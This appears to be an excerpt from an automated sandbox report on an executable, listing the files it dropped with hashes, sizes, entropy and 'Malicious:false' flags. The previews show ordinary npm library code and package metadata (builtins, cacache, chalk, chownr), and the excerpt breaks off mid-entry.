              SSDEEP:
              MD5:7C5D3007AE304CD4E5D25F405C958299
              SHA1:D65C19E3FD2635ACFDA4031C5248AED453D67B57
              SHA-256:A12A975FFC86A867FC7C72C1B5B8166B0C50FA53BDFEFF060F0B52337A8DDE32
              SHA-512:58B8E7B7642E07F34BCED80E05F4DAA8CF32C1B6AB76EE78DBA8EB987474AB300DCDDEE531E490C98BB4FCC01134ECCE81357CA3DA90E6F35210DDC8BEF791BD
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const semver = require('semver')..const permanentModules = [. 'assert',. 'buffer',. 'child_process',. 'cluster',. 'console',. 'constants',. 'crypto',. 'dgram',. 'dns',. 'domain',. 'events',. 'fs',. 'http',. 'https',. 'module',. 'net',. 'os',. 'path',. 'punycode',. 'querystring',. 'readline',. 'repl',. 'stream',. 'string_decoder',. 'sys',. 'timers',. 'tls',. 'tty',. 'url',. 'util',. 'vm',. 'zlib'.]..const versionLockedModules = {. freelist: '<6.0.0',. v8: '>=1.0.0',. process: '>=1.1.0',. inspector: '>=8.0.0',. async_hooks: '>=8.1.0',. http2: '>=8.4.0',. perf_hooks: '>=8.5.0',. trace_events: '>=10.0.0',. worker_threads: '>=12.0.0',. 'node:test': '>=18.0.0'.}..const experimentalModules = {. worker_threads: '>=10.5.0',. wasi: '>=12.16.0',. diagnostics_channel: '^14.17.0 || >=15.1.0'.}..module.exports = ({ version = process.version, experimental = false } = {}) => {. const builtins = [...permanentModules].. for (const [name, semve
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):449
              Entropy (8bit):4.585778889621007
              Encrypted:false
              SSDEEP:
              MD5:E7BA19053C023646661F8A7A1C2BE9BE
              SHA1:058C6E8B5B85A6BBFB7BACA27AE10FDC15A9A524
              SHA-256:A819D8D7C1CDCFE26BD6E3B69A4555188BDF2B54AB511C17DE07F779598681F5
              SHA-512:3DDA86C74044941F8F231D2F1E21B38779A917EED5FC2F60A9BD0BE2C1BA139020BF75D3DD647B9C35DB61570E8EC9332BF78BBFCCD0CB66921C629B18559EB0
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "builtins",. "version": "5.0.1",. "description": "List of node.js builtin modules",. "repository": "juliangruber/builtins",. "license": "MIT",. "main": "index.js",. "files": [],. "scripts": {. "test": "prettier-standard && standard && node-core-test". },. "dependencies": {. "semver": "^7.0.0". },. "devDependencies": {. "node-core-test": "^1.4.0",. "prettier-standard": "^15.0.1",. "standard": "^14.3.4". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):737
              Entropy (8bit):4.8633054835586265
              Encrypted:false
              SSDEEP:
              MD5:C66683453866DDCCF0A4B5A817A3C87C
              SHA1:E28059C54A7CA3CBB9B5B039DB061A24E533D880
              SHA-256:7EC9682EE3472435D866BDD35D18E2D570FFE98621BC230F30D31443BD04D8F7
              SHA-512:A19345927F9275A09FD7B4F06858BBA5B513751AF3C91885FACE9435C923993A2862EA91EB6C6492208EE6EDDD017F1B880CCD35F8ECBC86D0EA7AF0D173D3DA
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const contentVer = require('../../package.json')['cache-version'].content.const hashToSegments = require('../util/hash-to-segments').const path = require('path').const ssri = require('ssri')..// Current format of content file path:.//.// sha512-BaSE64Hex= ->.// ~/.my-cache/content-v2/sha512/ba/da/55deadbeefc0ffee.//.module.exports = contentPath..function contentPath (cache, integrity) {. const sri = ssri.parse(integrity, { single: true }). // contentPath is the *strongest* algo given. return path.join(. contentDir(cache),. sri.algorithm,. ...hashToSegments(sri.hexDigest()). ).}..module.exports.contentDir = contentDir..function contentDir (cache) {. return path.join(cache, `content-v${contentVer}`).}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4409
              Entropy (8bit):4.663891902622653
              Encrypted:false
              SSDEEP:
              MD5:A3738489FA3632AE7ECB44C63B38628D
              SHA1:3C4E8F1E4799F5AA913204888F54D81E65E53ED6
              SHA-256:DBE618214F63C11A58AEBDC97C3F646BC794DF809F5C773E34EFC9486202CE3E
              SHA-512:DA19DA7902ACBC36C187682E13422FA141A886E63E78F2A555804E0BA0FD450AE89901E66E954D44FFBF680938B3C1445E190FDDA24897DFA5B35AC79EC5A496
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const fs = require('fs/promises').const fsm = require('fs-minipass').const ssri = require('ssri').const contentPath = require('./path').const Pipeline = require('minipass-pipeline')..module.exports = read..const MAX_SINGLE_READ_SIZE = 64 * 1024 * 1024.async function read (cache, integrity, opts = {}) {. const { size } = opts. const { stat, cpath, sri } = await withContentSri(cache, integrity, async (cpath, sri) => {. // get size. const stat = await fs.stat(cpath). return { stat, cpath, sri }. }). if (typeof size === 'number' && stat.size !== size) {. throw sizeError(size, stat.size). }.. if (stat.size > MAX_SINGLE_READ_SIZE) {. return readPipeline(cpath, stat.size, sri, new Pipeline()).concat(). }.. const data = await fs.readFile(cpath, { encoding: null }). if (!ssri.checkData(data, sri)) {. throw integrityError(sri, cpath). }.. return data.}..const readPipeline = (cpath, size, sri, stream) => {. stream.push(. new fsm.ReadStream(cpath, {.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):481
              Entropy (8bit):4.5026507451572275
              Encrypted:false
              SSDEEP:
              MD5:4E1BD0B7EC57F9B1F6DED18C48F327BC
              SHA1:875D264C38047981031F7CA65D65B7D8523B5E3F
              SHA-256:F3F706375BBC097BC0FD091F0EEA8D07B98B8E1F7A1D203F3B87337312272672
              SHA-512:BD2E2D5D96F230A0909A9063E9D105C4C0AE5815CCBE2DC4A0461B02AEA06D9A0B79C4912B8BCE00EBB9DDC73E40314FF7510A684EE28187F04F6DD5E212975F
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const fs = require('fs/promises').const contentPath = require('./path').const { hasContent } = require('./read')..module.exports = rm..async function rm (cache, integrity) {. const content = await hasContent(cache, integrity). // ~pretty~ sure we can't end up with a content lacking sri, but be safe. if (content && content.sri) {. await fs.rm(contentPath(cache, content.sri), { recursive: true, force: true }). return true. } else {. return false. }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):5687
              Entropy (8bit):4.658489364800911
              Encrypted:false
              SSDEEP:
              MD5:851DDE26BEBE68F41E7B8488396D382A
              SHA1:CEF7A585557FDB45F906E449F9F99BAD59DAE7C5
              SHA-256:5AF02BB8B36884B211D779D4C5E50C425ED9FD67B925F7E8BECBC1750E4F7E8F
              SHA-512:273D241AA04831FCD40D8DF8D5922285C8588D0A4BCAF5A058BD60BEEBBA99EA506D9891F4FFE07EDBF64DFA9563E05A4F14B7E5BC4F735D982A6E8F7827DC7C
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const events = require('events')..const contentPath = require('./path').const fs = require('fs/promises').const { moveFile } = require('@npmcli/fs').const { Minipass } = require('minipass').const Pipeline = require('minipass-pipeline').const Flush = require('minipass-flush').const path = require('path').const ssri = require('ssri').const uniqueFilename = require('unique-filename').const fsm = require('fs-minipass')..module.exports = write..// Cache of move operations in process so we don't duplicate.const moveOperations = new Map()..async function write (cache, data, opts = {}) {. const { algorithms, size, integrity } = opts.. if (typeof size === 'number' && data.length !== size) {. throw sizeError(size, data.length). }.. const sri = ssri.fromData(data, algorithms ? { algorithms } : {}). if (integrity && !ssri.checkData(data, integrity, opts)) {. throw checksumError(integrity, sri). }.. for (const algo in sri) {. const tmp = await makeTmp(cache, opts).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1238
              Entropy (8bit):4.605599503613906
              Encrypted:false
              SSDEEP:
              MD5:8B736F68CBF8DF8C159F752DFF04E264
              SHA1:C11F68D63488E208186E21037B97455D4C2B5489
              SHA-256:56745BDDDF064BE6DED0E82452C7327C3A960A82D5FB26B021AEF41FA01E2B94
              SHA-512:1CAC2602B4D0FCDF199F22E3420B335D9242EE4B1F446784D648AA3E48EB1C6E9481B15BD4BC6B8ECF39CD5869D2693DF363425642834FEE2D767E4DC84676A7
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const get = require('./get.js').const put = require('./put.js').const rm = require('./rm.js').const verify = require('./verify.js').const { clearMemoized } = require('./memoization.js').const tmp = require('./util/tmp.js').const index = require('./entry-index.js')..module.exports.index = {}.module.exports.index.compact = index.compact.module.exports.index.insert = index.insert..module.exports.ls = index.ls.module.exports.ls.stream = index.lsStream..module.exports.get = get.module.exports.get.byDigest = get.byDigest.module.exports.get.stream = get.stream.module.exports.get.stream.byDigest = get.stream.byDigest.module.exports.get.copy = get.copy.module.exports.get.copy.byDigest = get.copy.byDigest.module.exports.get.info = get.info.module.exports.get.hasContent = get.hasContent..module.exports.put = put.module.exports.put.stream = put.stream..module.exports.rm = rm.entry.module.exports.rm.all = rm.all.module.exports.rm.entry = module.exports.rm.module.exports.rm.content = r
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):1485
              Entropy (8bit):5.0545516200553715
              Encrypted:false
              SSDEEP:
              MD5:851702AC4F324133AE6FAD625CF6776B
              SHA1:3478077A38C3CD123BDF2DEE8C9A7EC1EEB9C432
              SHA-256:F53CC4C8F9E85C4F96019C89B2C84B27C8ABC0A5FC936E0E9A60736AAD3B73D0
              SHA-512:0FAB96498FF926F7605D095E22BEC4A4EAC6810246B240AC7232512A330E79D244D263B0122843ED7A259DEBCE7C80D4140F19375F8F5C80715AEACB78E72E48
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const { LRUCache } = require('lru-cache')..const MEMOIZED = new LRUCache({. max: 500,. maxSize: 50 * 1024 * 1024, // 50MB. ttl: 3 * 60 * 1000, // 3 minutes. sizeCalculation: (entry, key) => key.startsWith('key:') ? entry.data.length : entry.length,.})..module.exports.clearMemoized = clearMemoized..function clearMemoized () {. const old = {}. MEMOIZED.forEach((v, k) => {. old[k] = v. }). MEMOIZED.clear(). return old.}..module.exports.put = put..function put (cache, entry, data, opts) {. pickMem(opts).set(`key:${cache}:${entry.key}`, { entry, data }). putDigest(cache, entry.integrity, data, opts).}..module.exports.put.byDigest = putDigest..function putDigest (cache, integrity, data, opts) {. pickMem(opts).set(`digest:${cache}:${integrity}`, data).}..module.exports.get = get..function get (cache, key, opts) {. return pickMem(opts).get(`key:${cache}:${key}`).}..module.exports.get.byDigest = getDigest..function getDigest (cache, integrity, opts) {. return pick
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1975
              Entropy (8bit):4.537398460331755
              Encrypted:false
              SSDEEP:
              MD5:19D056F5CCC691F09346FF0166058E6D
              SHA1:070A4A3D6739C9808599C6F1DC860EE2AA7139B7
              SHA-256:B131954EFBCB17F785E93278C53F4B0491C53009698B937EF68BBC7342134872
              SHA-512:DE680E1A1370BC139697A55BD0987D798733DBED00EDB78808A453BC1C2BA581E1C924ECB3CBB426E98A90693020E60956194307F7210B4E2D2B08F55EF047F4
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const index = require('./entry-index').const memo = require('./memoization').const write = require('./content/write').const Flush = require('minipass-flush').const { PassThrough } = require('minipass-collect').const Pipeline = require('minipass-pipeline')..const putOpts = (opts) => ({. algorithms: ['sha512'],. ...opts,.})..module.exports = putData..async function putData (cache, key, data, opts = {}) {. const { memoize } = opts. opts = putOpts(opts). const res = await write(cache, data, opts). const entry = await index.insert(cache, key, res.integrity, { ...opts, size: res.size }). if (memoize) {. memo.put(cache, entry, data, opts). }.. return res.integrity.}..module.exports.stream = putStream..function putStream (cache, key, opts = {}) {. const { memoize } = opts. opts = putOpts(opts). let integrity. let size. let error.. let memoData. const pipeline = new Pipeline(). // first item in the pipeline is the memoizer, because we need. // that to end firs
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):791
              Entropy (8bit):4.744588856734821
              Encrypted:false
              SSDEEP:
              MD5:308021F53C321C99E1A120E70F1AAE22
              SHA1:E8D9E66E76FEE498D27BAA38FFCFD3972F33BE96
              SHA-256:5155F5560ED63BEA74732C87D6A10732D5C6E5639785DCFDCDCF93A01943ABF6
              SHA-512:B0AB2FADFA782230C424B3E91DD0EB560A188E998D7888CA80CE41CEED8CF71BDAFE4C5039AA1A17A663D5502FC53188219C78452E0BE62C72E5E56FDCDDA766
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const { rm } = require('fs/promises').const glob = require('./util/glob.js').const index = require('./entry-index').const memo = require('./memoization').const path = require('path').const rmContent = require('./content/rm')..module.exports = entry.module.exports.entry = entry..function entry (cache, key, opts) {. memo.clearMemoized(). return index.delete(cache, key, opts).}..module.exports.content = content..function content (cache, integrity) {. memo.clearMemoized(). return rmContent(cache, integrity).}..module.exports.all = all..async function all (cache) {. memo.clearMemoized(). const paths = await glob(path.join(cache, '*(content-*|index-*)'), { silent: true, nosort: true }). return Promise.all(paths.map((p) => rm(p, { recursive: true, force: true }))).}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):222
              Entropy (8bit):4.6858033729085635
              Encrypted:false
              SSDEEP:
              MD5:A93D25B2624BE6221C62E3B3B437666D
              SHA1:A4CE33B8A230DAD740D44B6A4F74B4522E59FA4D
              SHA-256:A9FD56A76F0B4C39FFD94785128E79DDBC337210B9FEB4B09530616948ADEB69
              SHA-512:58BAF4C9A29291AD3BC559F421E393A450E4332B13BD2F664A1FCE45769493093C8327D97FC821D15790610B40015C0CA41596141216A2C121BE42D1AB89B3C8
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const { glob } = require('glob').const path = require('path')..const globify = (pattern) => pattern.split(path.win32.sep).join(path.posix.sep).module.exports = (path, options) => glob(globify(path), options).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):143
              Entropy (8bit):4.666947026489237
              Encrypted:false
              SSDEEP:
              MD5:4FDE78CC8125248B8ABF8A9831D497C1
              SHA1:A6F608135B099314B8CB4BB36C206D2F93BF2585
              SHA-256:ED10C878CB3C2B8570A32954B52DA3C49539549F64E36B3CE3AB38D7E524BF19
              SHA-512:11187C46AB16C06F8AF585C0A5E55E4947DA81C3967FB8D127E83C58079D4D0D4343023374ECADDEF4F53123E232D9C2F396BD0DC8832A01E779B4CAB4D7FC6E
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..module.exports = hashToSegments..function hashToSegments (hash) {. return [hash.slice(0, 2), hash.slice(2, 4), hash.slice(4)].}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):2048
              Entropy (8bit):4.640663022342863
              Encrypted:false
              SSDEEP:
              MD5:61A319CA8396F0C483D471EFD40ABDED
              SHA1:545D09B71949AC09F7309D70FAF842B9443995CF
              SHA-256:1D2E2E330A75B9083509279FC7A984E7E2B234A85176A01D58C3C17D73C8F2C9
              SHA-512:DD4723B3C7F2ACA72939B7002DAD5E6639E78D0011CE41898038C7EB2715732FF3B2F19A763B3D63ED1F0045D58DE44F6E431DF2A378E68F19C0B0AD025B544C
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "cacache",. "version": "18.0.0",. "cache-version": {. "content": "2",. "index": "5". },. "description": "Fast, fault-tolerant, cross-platform, disk-based, data-agnostic, content-addressable cache.",. "main": "lib/index.js",. "files": [. "bin/",. "lib/". ],. "scripts": {. "test": "tap",. "snap": "tap",. "coverage": "tap",. "test-docker": "docker run -it --rm --name pacotest -v \"$PWD\":/tmp -w /tmp node:latest npm test",. "lint": "eslint \"**/*.js\"",. "npmclilint": "npmcli-lint",. "lintfix": "npm run lint -- --fix",. "postsnap": "npm run lintfix --",. "postlint": "template-oss-check",. "posttest": "npm run lint",. "template-oss-apply": "template-oss-apply --force". },. "repository": {. "type": "git",. "url": "https://github.com/npm/cacache.git". },. "keywords": [. "cache",. "caching",. "content-addressable",. "sri",. "sri hash",. "subresource integrity",. "cache",. "storage",. "store",
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1640
              Entropy (8bit):4.912284939071875
              Encrypted:false
              SSDEEP:
              MD5:919BEABDE328DA65EF12852F35F9B308
              SHA1:5D2D4BD1F2D729B28B3BD29E208D02FB7449947B
              SHA-256:FF033C93B0D4256138F9E4C59283D9F5FFBB0630BF2E87A1B15033E51CDDC582
              SHA-512:95D02B949729576B4709E5F7EF929B4575E9FB6D802B67C5CE0C89480CD14A3BE7A12B6E98ACA57C2C54FBB6B30801B71D6D061373FBE65D67654292F7B1979F
              Malicious:false
              Reputation:unknown
              Preview:{.."name": "chalk",.."version": "5.3.0",.."description": "Terminal string styling done right",.."license": "MIT",.."repository": "chalk/chalk",.."funding": "https://github.com/chalk/chalk?sponsor=1",.."type": "module",.."main": "./source/index.js",.."exports": "./source/index.js",.."imports": {..."#ansi-styles": "./source/vendor/ansi-styles/index.js",..."#supports-color": {...."node": "./source/vendor/supports-color/index.js",...."default": "./source/vendor/supports-color/browser.js"...}..},.."types": "./source/index.d.ts",.."engines": {..."node": "^12.17.0 || ^14.13 || >=16.0.0"..},.."scripts": {..."test": "xo && c8 ava && tsd",..."bench": "matcha benchmark.js"..},.."files": [..."source",..."!source/index.test-d.ts"..],.."keywords": [..."color",..."colour",..."colors",..."terminal",..."console",..."cli",..."string",..."ansi",..."style",..."styles",..."tty",..."formatting",..."rgb",..."256",..."shell",..."xterm",..."log",..."logging",..."command-line",..."text"..],.."devDependencies":
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Java source, Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):5902
              Entropy (8bit):5.169325852917651
              Encrypted:false
              SSDEEP:
              MD5:EE09F19624A0936BAB9B4EBC183F7E44
              SHA1:D4FA6A254209E7A7A134482E16813600BD8F857A
              SHA-256:64B22B1C442E6D460069807B521BF0A84E112C00C2B4163BC59DEAB20A9292DB
              SHA-512:2AEAA41E5FE1FFC5249816CBE56B78DF3F6D4B8830B1AB01DB740B3F58CD173FF3F2B6724F7F89A1B821EDE69AF279D6DCF722320476D745A3DE88B38978C5C7
              Malicious:false
              Reputation:unknown
              Preview:import ansiStyles from '#ansi-styles';.import supportsColor from '#supports-color';.import { // eslint-disable-line import/order..stringReplaceAll,..stringEncaseCRLFWithFirstIndex,.} from './utilities.js';..const {stdout: stdoutColor, stderr: stderrColor} = supportsColor;..const GENERATOR = Symbol('GENERATOR');.const STYLER = Symbol('STYLER');.const IS_EMPTY = Symbol('IS_EMPTY');..// `supportsColor.level` . `ansiStyles.color[name]` mapping.const levelMapping = [..'ansi',..'ansi',..'ansi256',..'ansi16m',.];..const styles = Object.create(null);..const applyOptions = (object, options = {}) => {..if (options.level && !(Number.isInteger(options.level) && options.level >= 0 && options.level <= 3)) {...throw new Error('The `level` option should be an integer from 0 to 3');..}...// Detect level if not set manually..const colorLevel = stdoutColor ? stdoutColor.level : 0;..object.level = options.level === undefined ? colorLevel : options.level;.};..export class Chalk {..constructor(options) {.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):997
              Entropy (8bit):4.912961581516703
              Encrypted:false
              SSDEEP:
              MD5:255E1ABA69EFB0EA87A80187014DDB62
              SHA1:EA09F50E3845CCF559C9254B0227605194ABA4C2
              SHA-256:698CE3CB21B00B570631742D3A9E168DE31DF74B3A88220C4BCF18AC30FD00CD
              SHA-512:11CBE251AB93878874E07E77993207EA584EC90891BDD4C9E312873257D11EE35923AF9C39A4D1B55458EE3C423E4BC1FAD948921158C98A5BF88A957B6F2D5A
              Malicious:false
              Reputation:unknown
              Preview:// TODO: When targeting Node.js 16, use `String.prototype.replaceAll`..export function stringReplaceAll(string, substring, replacer) {..let index = string.indexOf(substring);..if (index === -1) {...return string;..}...const substringLength = substring.length;..let endIndex = 0;..let returnValue = '';..do {...returnValue += string.slice(endIndex, index) + substring + replacer;...endIndex = index + substringLength;...index = string.indexOf(substring, endIndex);..} while (index !== -1);...returnValue += string.slice(endIndex);..return returnValue;.}..export function stringEncaseCRLFWithFirstIndex(string, prefix, postfix, index) {..let endIndex = 0;..let returnValue = '';..do {...const gotCR = string[index - 1] === '\r';...returnValue += string.slice(endIndex, (gotCR ? index - 1 : index)) + prefix + (gotCR ? '\r\n' : '\n') + postfix;...endIndex = index + 1;...index = string.indexOf('\n', endIndex);..} while (index !== -1);...returnValue += string.slice(endIndex);..return returnValue;.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):5256
              Entropy (8bit):5.3798465325073375
              Encrypted:false
              SSDEEP:
              MD5:28B0A5FEBE3644A01D488578292DE4F0
              SHA1:7C4F8BB0AFB95A83378DD24F08CC07733D94027E
              SHA-256:92EFDC3E5203D02D1710FF60DEA3965066F97A77C0FEAAA919B2693C989B7EC1
              SHA-512:097229B03059E172F96C45F87D07562BD6E1D6A21547A64DD45DB53C26CC41AAC67E6FF38EE0489FD6DAEE0CED7998C19A712738C84D8264BEF7678FBDB5B306
              Malicious:false
              Reputation:unknown
              Preview:const ANSI_BACKGROUND_OFFSET = 10;..const wrapAnsi16 = (offset = 0) => code => `\u001B[${code + offset}m`;..const wrapAnsi256 = (offset = 0) => code => `\u001B[${38 + offset};5;${code}m`;..const wrapAnsi16m = (offset = 0) => (red, green, blue) => `\u001B[${38 + offset};2;${red};${green};${blue}m`;..const styles = {..modifier: {...reset: [0, 0],...// 21 isn't widely supported and 22 does the same thing...bold: [1, 22],...dim: [2, 22],...italic: [3, 23],...underline: [4, 24],...overline: [53, 55],...inverse: [7, 27],...hidden: [8, 28],...strikethrough: [9, 29],..},..color: {...black: [30, 39],...red: [31, 39],...green: [32, 39],...yellow: [33, 39],...blue: [34, 39],...magenta: [35, 39],...cyan: [36, 39],...white: [37, 39],....// Bright color...blackBright: [90, 39],...gray: [90, 39], // Alias of `blackBright`...grey: [90, 39], // Alias of `blackBright`...redBright: [91, 39],...greenBright: [92, 39],...yellowBright: [93, 39],...blueBright: [94, 39],...magentaBright: [95, 39],...cyanBright
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):532
              Entropy (8bit):5.067052926271862
              Encrypted:false
              SSDEEP:
              MD5:F2D4D55AD21C704DA4EEF3DA60049F7B
              SHA1:0936BAD557240C5BCA7A6593ED8A19C5B91B7031
              SHA-256:42ED5CBAA24F7BAF29C28CAE4DEBDFBCA0C33B9282C079D6851130143605B1FC
              SHA-512:CBC7F72127EEE8BF2CEAE58FC9683208EEF7455B45153A52964A4988AE33925B68F071C08F811AA533353FD2A1B486FD7AE523ABB1E44F9FB12C11E4012CE37C
              Malicious:false
              Reputation:unknown
              Preview:/* eslint-env browser */..const level = (() => {..if (navigator.userAgentData) {...const brand = navigator.userAgentData.brands.find(({brand}) => brand === 'Chromium');...if (brand && brand.version > 93) {....return 3;...}..}...if (/\b(Chrome|Chromium)\//.test(navigator.userAgent)) {...return 1;..}...return 0;.})();..const colorSupport = level !== 0 && {..level,..hasBasic: true,..has256: level >= 2,..has16m: level >= 3,.};..const supportsColor = {..stdout: colorSupport,..stderr: colorSupport,.};..export default supportsColor;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Java source, ASCII text
              Category:dropped
              Size (bytes):3855
              Entropy (8bit):5.401246655925297
              Encrypted:false
              SSDEEP:
              MD5:75CC7F0B87AD9E857BF71B18ADFCC046
              SHA1:84EF36E84894EFAA7ABA9C1643F00608E5F1D8D0
              SHA-256:13B5FC8A0B139D257260D1E625726744609C24A3B58535AFBB602389997E60D6
              SHA-512:C6ABDB670ADAC05D631526B91554C474A88B8143C9EA8BA25971E0D4FD69DE9201DD2E0230A7E8655BFF9EF497AE371D9F824DCBB9C1E83202C893001EF7542C
              Malicious:false
              Reputation:unknown
              Preview:import process from 'node:process';.import os from 'node:os';.import tty from 'node:tty';..// From: https://github.com/sindresorhus/has-flag/blob/main/index.js./// function hasFlag(flag, argv = globalThis.Deno?.args ?? process.argv) {.function hasFlag(flag, argv = globalThis.Deno ? globalThis.Deno.args : process.argv) {..const prefix = flag.startsWith('-') ? '' : (flag.length === 1 ? '-' : '--');..const position = argv.indexOf(prefix + flag);..const terminatorPosition = argv.indexOf('--');..return position !== -1 && (terminatorPosition === -1 || position < terminatorPosition);.}..const {env} = process;..let flagForceColor;.if (..hasFlag('no-color')..|| hasFlag('no-colors')..|| hasFlag('color=false')..|| hasFlag('color=never').) {..flagForceColor = 0;.} else if (..hasFlag('color')..|| hasFlag('colors')..|| hasFlag('color=true')..|| hasFlag('color=always').) {..flagForceColor = 1;.}..function envForceColor() {..if ('FORCE_COLOR' in env) {...if (env.FORCE_COLOR === 'true') {....return 1;.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4275
              Entropy (8bit):4.796193844022171
              Encrypted:false
              SSDEEP:
              MD5:227F54D2F419316FCF6B9FD1E1BF34AA
              SHA1:0BEDFD417B196606FF4B7D4C7AE6C9BB318F23E7
              SHA-256:529B285703D29B8AB31EAD64BD1F64146BAC12147CC09CEB4B25F0DB87A12C96
              SHA-512:36DD24F1EB26F796EF841459850C4C8BA28296ACB3570FE8643AE270384CCD721635ED728E20573CBFCB43EE49CEF50CDEDE2699D4C7714798847BE43A2D3BEB
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.const fs = require('fs').const path = require('path')../* istanbul ignore next */.const LCHOWN = fs.lchown ? 'lchown' : 'chown'./* istanbul ignore next */.const LCHOWNSYNC = fs.lchownSync ? 'lchownSync' : 'chownSync'../* istanbul ignore next */.const needEISDIRHandled = fs.lchown &&. !process.version.match(/v1[1-9]+\./) &&. !process.version.match(/v10\.[6-9]/)..const lchownSync = (path, uid, gid) => {. try {. return fs[LCHOWNSYNC](path, uid, gid). } catch (er) {. if (er.code !== 'ENOENT'). throw er. }.}../* istanbul ignore next */.const chownSync = (path, uid, gid) => {. try {. return fs.chownSync(path, uid, gid). } catch (er) {. if (er.code !== 'ENOENT'). throw er. }.}../* istanbul ignore next */.const handleEISDIR =. needEISDIRHandled ? (path, uid, gid, cb) => er => {. // Node prior to v10 had a very questionable implementation of. // fs.lchown, which would always try to call fs.open on a directory. // Fall back to fs.chown in thos
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):649
              Entropy (8bit):4.680813795439875
              Encrypted:false
              SSDEEP:
              MD5:8F7EEB8B80A6EBB304DF487B88CBD703
              SHA1:A23947ADE20A2757D5ABF7F9FEC197C2674C0A20
              SHA-256:96BA7FC1DCFAD50DE6C406FB3FCFE57850EBEA4D8ECEDBC0B45B9C59FC629D69
              SHA-512:7F57CEE36355F587DA7C2C219CF5CC2C79C8E4B8653F95A561F664A94240667344331967E44FA306EF58E05023CED023889FC1FAC65795207C8D6553A611A185
              Malicious:false
              Reputation:unknown
              Preview:{. "author": "Isaac Z. Schlueter <i@izs.me> (http://blog.izs.me/)",. "name": "chownr",. "description": "like `chown -R`",. "version": "2.0.0",. "repository": {. "type": "git",. "url": "git://github.com/isaacs/chownr.git". },. "main": "chownr.js",. "files": [. "chownr.js". ],. "devDependencies": {. "mkdirp": "0.3",. "rimraf": "^2.7.1",. "tap": "^14.10.6". },. "tap": {. "check-coverage": true. },. "scripts": {. "test": "tap",. "preversion": "npm test",. "postversion": "npm publish",. "prepublishOnly": "git push origin --follow-tags". },. "license": "ISC",. "engines": {. "node": ">=10". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1086
              Entropy (8bit):5.094125226844261
              Encrypted:false
              SSDEEP:
              MD5:A951D4F63F1AF9937E6AF6D0CEA34E22
              SHA1:32CD9437CB34A9BC5ECF96163AEFBBCE846FC493
              SHA-256:F58943CB354FB2707FEA2F7B26B04E6014DDB56835CDFD414C9D2C6C59165B64
              SHA-512:C0A29ED1FAE9FCB6A434A8B797204F2BDDF123631B04DAB50E8612DDA6970AEB530541189CCE740FB5C3887E9811FA923C6801952F29704D40EC6DD0EA8AF4F8
              Malicious:false
              Reputation:unknown
              Preview:The MIT License (MIT)..Copyright (c) 2016 Thomas Watson Steen..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OU
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2368
              Entropy (8bit):4.988539395678311
              Encrypted:false
              SSDEEP:
              MD5:1061D930EBFD02FD8BB01CA34911096A
